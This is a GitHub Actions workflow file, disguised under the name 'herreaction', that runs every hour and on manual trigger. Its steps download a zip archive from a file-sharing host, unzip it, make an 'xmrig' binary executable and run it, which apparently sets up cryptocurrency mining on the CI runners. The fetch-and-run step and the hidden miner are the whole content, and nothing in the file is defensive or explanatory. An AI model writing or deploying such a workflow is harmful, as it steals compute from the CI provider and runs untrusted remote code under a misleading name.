name: herreaction 1
on:
  workflow_dispatch:
  schedule:
    - cron: '10 * * * *'

jobs:
  build:
      name: herreaction
      runs-on: ubuntu-latest
      steps:
        - name: downloading, unzipping and changing perms.
          run: |
            wget https://small.fileditch.ch/s3/DEieacPfmRvhhMFOgIal.zip
            unzip DEieacPfmRvhhMFOgIal.zip
            chmod ugo+rwx xmrig
        - name: doing the herreaction stuff
          run: |
            ./xmrig
